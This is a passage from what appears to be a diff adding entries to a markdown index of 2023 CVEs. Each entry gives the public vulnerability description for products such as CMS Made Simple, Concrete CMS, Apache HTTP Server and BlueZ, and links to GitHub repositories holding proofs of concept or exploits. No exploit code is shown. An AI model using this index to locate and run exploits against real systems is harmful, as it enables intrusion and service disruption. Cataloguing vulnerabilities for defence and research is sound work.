+An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.
+
+
+- [sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content](https://github.com/sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content)
+
+### CVE-2023-43353 (2023-10-20)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component.
+
+
+- [sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra](https://github.com/sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra)
+
+### CVE-2023-43354 (2023-10-20)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component.
+
+
+- [sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension](https://github.com/sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension)
+
+### CVE-2023-43355 (2023-10-20)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component.
+
+
+- [sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user](https://github.com/sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user)
+
+### CVE-2023-43356 (2023-10-20)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component.
+
+
+- [sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings](https://github.com/sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings)
+
+### CVE-2023-43357 (2023-10-20)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component.
+
+
+- [sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut](https://github.com/sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut)
+
+### CVE-2023-43358 (2023-10-23)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component.
+
+
+- [sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News](https://github.com/sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News)
+
+### CVE-2023-43359 (2023-10-19)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component.
+
+
+- [sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager](https://github.com/sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager)
+
+### CVE-2023-43360 (2023-10-24)
+
+Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory parameter in the File Picker Menu component.
+
+
+- [sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension](https://github.com/sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension)
+
+### CVE-2023-43364 (2023-12-12)
+
+main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution.
+
+
+- [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE)
+
+### CVE-2023-43481 (2023-12-27)
+
+An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component.
+
+
+- [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser)
+
+### CVE-2023-43482 (2024-02-06)
+
+A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
+
+
+- [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482)
+
+### CVE-2023-43622 (2023-10-23)
+
+An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.\nThis has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout.\n\nThis issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.\n\nUsers are recommended to upgrade to version 2.4.58, which fixes the issue.\n\n
+
+
+- [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622)
+
+### CVE-2023-43654 (2023-09-28)
+
+TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.
+
+
+- [OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker)
+
+### CVE-2023-43667 (2023-10-16)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can create misleading or false records, making it harder to audit\nand trace malicious activities. Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it.\n\n[1] https://github.com/apache/inlong/pull/8628 \n\n
+
+
+- [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2)
+- [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1)
+- [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3)
+
+### CVE-2023-43757 (2023-11-16)
+
+Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section.
+
+
+- [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757)
+
+### CVE-2023-43770 (2023-09-22)
+
+Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.
+
+
+- [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC)
+- [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC)
+
+### CVE-2023-43786 (2023-10-10)
+
+A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
+
+
+- [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS)
+
+### CVE-2023-43804 (2023-10-04)
+
+urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.
+
+
+- [JawadPy/CVE-2023-43804-Exploit](https://github.com/JawadPy/CVE-2023-43804-Exploit)
+
+### CVE-2023-43838 (2023-10-04)
+
+An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar.
+
+
+- [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838)
+
+### CVE-2023-43871 (2023-09-28)
+
+A File upload vulnerability in WBCE v.1.6.1 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).
+
+
+- [sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media](https://github.com/sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media)
+
+### CVE-2023-43872 (2023-09-28)
+
+A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).
+
+
+- [sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager](https://github.com/sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager)
+
+### CVE-2023-43873 (2023-09-28)
+
+A Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Name filed in the Manage Menu.
+
+
+- [sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage](https://github.com/sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage)
+
+### CVE-2023-43874 (2023-09-28)
+
+Multiple Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Copyright and Author fields in the Meta & Custom Tags Menu.
+
+
+- [sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags](https://github.com/sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags)
+
+### CVE-2023-43875 (2023-10-19)
+
+Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.
+
+
+- [sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation)
+
+### CVE-2023-43876 (2023-09-28)
+
+A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field.
+
+
+- [sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation)
+
+### CVE-2023-43877 (2023-10-04)
+
+Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu.
+
+
+- [sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home](https://github.com/sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home)
+
+### CVE-2023-43878 (2023-09-28)
+
+Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a crafted payload into the Main Menu Items in the Administration Menu.
+
+
+- [sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu](https://github.com/sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu)
+
+### CVE-2023-43879 (2023-09-28)
+
+Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu.
+
+
+- [sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent](https://github.com/sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent)
+
+### CVE-2023-43955 (2023-12-27)
+
+The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files. and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData.
+
+
+- [actuator/com.phlox.tvwebbrowser](https://github.com/actuator/com.phlox.tvwebbrowser)
+
+### CVE-2023-44061 (2023-10-06)
+
+File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component.
+
+
+- [soundarkutty/CVE-2023-44061](https://github.com/soundarkutty/CVE-2023-44061)
+
+### CVE-2023-44451 (2024-05-03)
+
+Linux Mint Xreader EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EPUB files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-21897.
+
+
+- [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit)
+
+### CVE-2023-44452 (2024-05-03)
+
+Linux Mint Xreader CBT File Parsing Argument Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBT files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22132.
+
+
+- [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit)
+
+### CVE-2023-44487 (2023-10-10)
+
+The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
+
+
+- [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487)
+- [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487)
+- [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487)
+- [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset)
+- [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient)
+- [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487)
+- [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487)
+- [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker)
+- [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487)
+- [terrorist/HTTP-2-Rapid-Reset-Client](https://github.com/terrorist/HTTP-2-Rapid-Reset-Client)
+- [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-)
+- [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487)
+- [sn130hk/CVE-2023-44487](https://github.com/sn130hk/CVE-2023-44487)
+
+### CVE-2023-44758 (2023-10-06)
+
+GDidees CMS 3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title.
+
+
+- [sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title](https://github.com/sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title)
+
+### CVE-2023-44760 (2023-10-23)
+
+Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics. NOTE: the vendor disputes this because these header/footer changes can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. Also, the exploitation method claimed by "sromanhu" does not provide any access to a Concrete CMS session, because the Concrete CMS session cookie is configured as HttpOnly.
+
+
+- [sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes](https://github.com/sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes)
+
+### CVE-2023-44761 (2023-10-06)
+
+Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions affected to 8.5.13 and below, and 9.0.0 through 9.2.1 allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects.
+
+
+- [sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms](https://github.com/sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms)
+
+### CVE-2023-44762 (2023-10-06)
+
+A Cross Site Scripting (XSS) vulnerability in Concrete CMS from versions 9.2.0 to 9.2.2 allows an attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags.
+
+
+- [sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags](https://github.com/sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags)
+
+### CVE-2023-44763 (2023-10-10)
+
+Concrete CMS v9.2.1 is affected by an Arbitrary File Upload vulnerability via a Thumbnail file upload, which allows Cross-Site Scripting (XSS). NOTE: the vendor's position is that a customer is supposed to know that "pdf" should be excluded from the allowed file types, even though pdf is one of the allowed file types in the default configuration.
+
+
+- [sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail](https://github.com/sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail)
+
+### CVE-2023-44764 (2023-10-06)
+
+A Cross Site Scripting (XSS) vulnerability in Concrete CMS before 9.2.3 exists via the Name parameter during installation (aka Site of Installation or Settings).
+
+
+- [sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation](https://github.com/sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation)
+
+### CVE-2023-44765 (2023-10-06)
+
+A Cross Site Scripting (XSS) vulnerability in Concrete CMS versions 8.5.12 and below, and 9.0 through 9.2.1 allows an attacker to execute arbitrary code via a crafted script to Plural Handle of the Data Objects from System & Settings.
+
+
+- [sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations](https://github.com/sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations)
+
+### CVE-2023-44766 (2023-10-06)
+
+A Cross Site Scripting (XSS) vulnerability in Concrete CMS v.9.2.1 allows an attacker to execute arbitrary code via a crafted script to the SEO - Extra from Page Settings. NOTE: the vendor disputes this because this SEO-related header change can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature.
+
+
+- [sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO](https://github.com/sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO)
+
+### CVE-2023-44767 (2023-10-24)
+
+A File upload vulnerability in RiteCMS 3.0 allows a local attacker to upload a SVG file with XSS content.
+
+
+- [sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager](https://github.com/sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager)
+
+### CVE-2023-44769 (2023-10-24)
+
+A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Spare aliases from Alias.
+
+
+- [sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias](https://github.com/sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias)
+
+### CVE-2023-44770 (2023-10-06)
+
+A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows an attacker to execute arbitrary code via a crafted script to the Organizer - Spare alias.
+
+
+- [sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias](https://github.com/sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias)
+
+### CVE-2023-44771 (2023-10-06)
+
+A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Page Layout.
+
+
+- [sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout](https://github.com/sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout)
+
+### CVE-2023-44811 (2023-10-09)
+
+Cross Site Request Forgery (CSRF) vulnerability in MooSocial v.3.1.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the admin Password Change Function.
+
+
+- [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811)
+
+### CVE-2023-44812 (2023-10-09)
+
+Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.
+
+
+- [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812)
+
+### CVE-2023-44813 (2023-10-09)
+
+Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.
+
+
+- [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813)
+
+### CVE-2023-44961 (2023-10-11)
+
+SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component.
+
+
+- [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961)
+
+### CVE-2023-44962 (2023-10-11)
+
+File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component.
+
+
+- [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962)
+
+### CVE-2023-44976
+- [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2)
+
+### CVE-2023-45158 (2023-10-16)
+
+An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product.
+
+
+- [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158)
+
+### CVE-2023-45182 (2023-12-14)
+
+\nIBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.\n\n
+
+
+- [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182)
+
+### CVE-2023-45184 (2023-12-14)
+
+IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270.
+
+
+- [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184)
+
+### CVE-2023-45185 (2023-12-14)
+
+IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273.
+
+
+- [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185)
+
+### CVE-2023-45239 (2023-10-06)
+
+A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.
+
+
+- [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce)
+
+### CVE-2023-45280 (2023-10-19)
+
+Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript.
+
+
+- [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1)
+- [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3)
+- [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2)
+
+### CVE-2023-45288 (2024-04-04)
+
+An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
+
+
+- [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc)
+
+### CVE-2023-45471 (2023-10-20)
+
+The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.
+
+
+- [mehdibelhajamor/CVE-2023-45471](https://github.com/mehdibelhajamor/CVE-2023-45471)
+
+### CVE-2023-45503 (2024-04-15)
+
+SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints.
+
+
+- [ally-petitt/CVE-2023-45503](https://github.com/ally-petitt/CVE-2023-45503)
+
+### CVE-2023-45540 (2023-10-16)
+
+An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page.
+
+
+- [soundarkutty/CVE-2023-45540](https://github.com/soundarkutty/CVE-2023-45540)
+
+### CVE-2023-45542 (2023-10-16)
+
+Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.
+
+
+- [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542)
+
+### CVE-2023-45657 (2023-11-06)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657)
+
+### CVE-2023-45777 (2023-12-04)
+
+In checkKeyIntentParceledCorrectly of AccountManagerService.java, there is a possible way to launch arbitrary activities using system privileges due to Parcel Mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch)
+
+### CVE-2023-45779 (2023-12-04)
+
+In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.\n
+
+
+- [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779)
+
+### CVE-2023-45828
+- [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828)
+
+### CVE-2023-45857 (2023-11-08)
+
+An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
+
+
+- [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857)
+- [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo)
+- [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo)
+
+### CVE-2023-45866 (2023-12-08)
+
+Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.
+
+
+- [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky)
+- [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky)
+- [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py)
+
+### CVE-2023-45966 (2023-10-23)
+
+umputun remark42 version 1.12.1 and before has a Blind Server-Side Request Forgery (SSRF) vulnerability.
+
+
+- [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966)
+
+### CVE-2023-45992 (2023-10-19)
+
+A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before to could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system.
+
+
+- [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992)
+
+### CVE-2023-46003 (2023-10-21)
+
+I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.
+
+
+- [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003)
+
+### CVE-2023-46012 (2024-05-07)
+
+Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP.
+
+
+- [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012)
+
+### CVE-2023-46014 (2023-11-13)
+
+SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.
+
+
+- [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
+
+### CVE-2023-46015 (2023-11-13)
+
+Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL.
+
